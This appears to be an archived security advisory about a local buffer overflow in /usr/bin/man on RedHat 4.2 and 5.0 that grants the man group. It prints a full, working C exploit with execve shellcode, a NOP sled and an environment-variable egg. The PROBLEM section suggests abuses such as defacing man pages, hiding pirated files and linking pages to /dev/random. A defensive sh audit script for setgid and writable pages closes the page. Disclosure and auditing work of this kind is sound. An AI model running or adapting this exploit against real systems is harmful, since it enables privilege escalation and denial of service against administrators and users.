COMMAND
man
SYSTEMS AFFECTED
RedHat 4.2, 5.0 (others?)
PROBLEM
Neil Trobaugh posted the following. Obviously this vulnerability is
not excessively serious. However, it can still make life unpleasant
for an admin... After all, DoS is DoS.
Local unprivileged users can overflow a buffer in /usr/bin/man
and receive egid man. Malicious users could then change the
content of man pages or replace them with ASCII porn, ANSI bombs, the
+++ATH DoS, or even use the catman directory to stash warez. DoS
attacks are also possible, such as linking man pages to /dev/random,
urandom, or zero. Exploit follows:
/*
 *
 * Discovered and exploited by /\/ecr0mancer of [S.T.S.I]
 * Code ripped from Smashing the Stack...Thanks to Aleph1
 *
 * Worked with offsets between 400-800 on my 4.2 (2.0.30) system.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Linux/x86 execve("/bin/sh") shellcode taken from Aleph One's paper. */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Returns the current stack pointer (Aleph One's helper; relies on
 * the value being left in %eax, so build without optimisation). */
unsigned long get_esp(void) {
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
    char *buff, *ptr, *egg;
    long *addr_ptr, addr;
    int offset=600, bsize=4500;
    int i, eggsize=2048;

    /* An optional first argument overrides the default stack offset. */
    if (argc > 1) offset = atoi(argv[1]);

    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }
    if (!(egg = malloc(eggsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    /* Guess where the egg will sit relative to the current stack. */
    addr = get_esp() - offset;
    printf("Using address: 0x%x\n", addr);

    /* buff: the guessed address repeated across the whole buffer. */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr;

    /* egg: a NOP sled followed by the shellcode. */
    ptr = egg;
    for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
        *(ptr++) = 0x90;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';
    egg[eggsize - 1] = '\0';

    /* Both buffers are exported through the environment; man is then
     * run with $RET as its argument. */
    memcpy(egg,"EGG=",4);
    putenv(egg);
    memcpy(buff,"RET=",4);
    putenv(buff);
    system("/usr/bin/man $RET");
    return 0;
}
SOLUTION
I think RedHat 5.x fixed this, while you will have to patch 4.2 on
your own. On 5.1 this doesn't work.
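As an added check, not part of the original post, here is a small sh audit for the conditions the post describes: a setgid man binary, man-page entries that are symlinks into /dev, and pages writable by the man group. The binary and directory paths are passed as arguments (an assumption made so it can be run against a test tree as well as the real /usr/share/man and catman directories).

```shell
#!/bin/sh
# Audit helper written for this page; not from the original advisory.
# All paths are arguments so the functions can be exercised on a scratch tree.

# Print "setgid" if the binary carries the setgid bit, otherwise "plain".
man_setgid_status() {
    if [ -g "$1" ]; then echo setgid; else echo plain; fi
}

# List symlinks under the given directories whose target is under /dev
# (the /dev/random, urandom and zero DoS described in the post).
find_dev_symlinks() {
    for dir in "$@"; do
        find "$dir" -type l 2>/dev/null | while read -r link; do
            target=$(readlink "$link")
            case "$target" in
                /dev/*) echo "$link -> $target" ;;
            esac
        done
    done
}

# List regular files under the given directories that are group-writable;
# with egid man that is exactly what an attacker could modify.
find_group_writable() {
    for dir in "$@"; do
        find "$dir" -type f -perm -020 2>/dev/null
    done
}

# Full report: first argument is the man binary, the rest are page directories.
audit_man() {
    bin=$1; shift
    echo "$bin: $(man_setgid_status "$bin")"
    echo "symlinks into /dev:"
    find_dev_symlinks "$@"
    echo "group-writable pages:"
    find_group_writable "$@"
}

# Run the audit when invoked with paths, e.g.:
#   sh man_audit.sh /usr/bin/man /usr/share/man /var/cache/man
if [ "$#" -ge 2 ]; then
    audit_man "$@"
fi
```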